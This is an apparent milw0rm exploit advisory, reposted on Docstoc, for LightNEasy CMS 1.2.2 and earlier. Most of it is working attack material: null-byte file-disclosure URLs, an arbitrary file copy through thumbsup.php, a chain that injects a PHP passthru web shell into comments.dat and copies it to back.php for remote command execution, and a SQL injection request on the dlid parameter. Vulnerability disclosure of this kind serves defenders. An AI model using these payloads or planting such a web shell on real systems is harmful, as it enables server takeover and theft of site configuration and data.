Docstoc

LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities

Document Sample
LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities Powered By Docstoc
					                      LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities                         Page 1/3
   1    # Author:          __GiReX__
   2    # mySite:          girex.altervista.org
   3    # Date:            14/04/08
   4
   5    # CMS:             LightNEasy SQLite / no database <= 1.2.2
   6    # Site:            lightneasy.org
   7
   8    # Advisory:        Multiple Remote Vulnerabilities
   9
   10   # Need:           magic_quotes_gpc = Off
   11                     magic_quotes_gpc = On / Off for SQL Injections
   12
   13   ######################################################################################
   14
   15   # Bug 1:          Remote File Disclosure
   16   # Affected:       SQLite / no database
   17
   18   # Get the config.php into HTML (like a comment)
   19   # Note config.php not exists in SQLite version
   20
   21   # PoC:            [host]/[path]/LightNEasy.php?page=config.php%00
   22
   23   ######################################################################################
   24
   25   # Bug 2:          Arbitrary file copy and rename / Thumsup v1.12
   26   # Affected:       SQLite / no database
   27
   28   # This vuln is present in this extern script by Gerd Tentler that is included by default
   29   # in LightNEasy
   30
   31   # Vuln Code:      LightNEasy/thumbsup.php
   32
   33   34.    if(isset($_REQUEST[’image’])) $image = $_REQUEST[’image’];
   34   37.    if(isset($_REQUEST[’cache_dir’])) $cache_dir = $_REQUEST[’cache_dir’];
   35
   36   407.   if($image) {
   37            if($fp = @fopen($image, ’rb’)) {      <==
   38              $size = filesize($image);           <==   Unfortunally filesize does not accept remote files
   39              $data = fread($fp, $size);          <==
   40             fclose($fp);
   41
   42              $original = "$cache_dir/img_" . md5($image . $size);   <==
   43            }
   44              else $error = ’Could not open’;
   45   414.   }
   46
   47   451.   if(!file_exists($original)) {
   48                if($fp = @fopen($original, ’wb’)) {          <==
   49                  fwrite($fp, $data, strlen($data));         <==
   50                  fclose($fp);
   51   455.      }
   52

girex                                                                                                             04/15/2008
                      LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities                             Page 2/3
   53   # Note config.php not exists in SQLite version
   54
   55   # PoC:            [host]/[path]/LightNEasy/thumbsup.php?image=../data/config.php&cache_dir=config.txt%00
   56
   57   # And then get file disclosure with:
   58
   59   # PoC:            [host]/[path]/LightNEasy/config.txt
   60
   61   ######################################################################################
   62
   63   # Bug 3:          Getting a Remote Command Execution
   64   # Affected:       SQLite / no database
   65
   66   # First of all inject PHP Code into comments.dat from $_POST[’newsid’] that is not sanizated
   67
   68   # Vuln code:      LightNEasy/runtime.php
   69
   70   32.      if($_POST[’submit’]=="sendcomment") {
   71   ...
   72   42.      if(!$fp=fopen("data/comments.dat","a")) die ($langmessage[142]);
   73   43.         fwrite($fp,$_POST[’newsid’]."|".encode($_POST[’commentname’])."|".    <==
   74   44.         encode($_POST[’commentemail’])."|".time()."|".encode(stripslashes($_POST[’commentmessage’]))."||");
   75
   76
   77   # PoC:    If admin has been created some news and page news exists (it can has a different name)
   78
   79            POST [host]/[path]/LightNEasy.php?page=news
   80            Content−Type: application/x−www−form−urlencoded
   81
   82            commentname=1&commentemail=1&commentmessage=1&secCode=[CAPTCHA CODE]
   83            &submit=sendcomment&newsid=<?php passthru($_GET[’cmd’]); ?>/*
   84
   85
   86   # Then create a file back.php with the trick of Bug 2
   87
   88   # PoC:            [host]/[path]/LightNEasy/thumbsup.php?image=../data/comments.dat&cache_dir=../back.php%00
   89
   90   # Finally send remote commands to back.php
   91
   92   # PoC:            [host]/[path]/back.php?cmd=ls
   93
   94   ######################################################################################
   95
   96   # Bug 4:          Multiple Remote SQL Injections
   97   # Affected:       SQLite
   98
   99   # Works with magic_quotes_gpc = On / Off
  100
  101
  102   # Vuln Code:      /LightNEasy/lightneasy.php
  103
  104   237.      if(isset($_GET[’dlid’])) {
girex                                                                                                                 04/15/2008
                   LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities           Page 3/3
  105              $result=dbquery("SELECT * FROM downloads WHERE reg=".$_GET[’dlid’]);
  106
  107
  108   # PoC:          [host]/[path]/index.php?dlid=−1 OR 1
  109
  110   # You can find others more SQL Injections by yourself
  111
  112   ######################################################################################
  113
  114   # milw0rm.com [2008−04−15]




girex                                                                                            04/15/2008

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:33
posted:5/24/2010
language:English
pages:3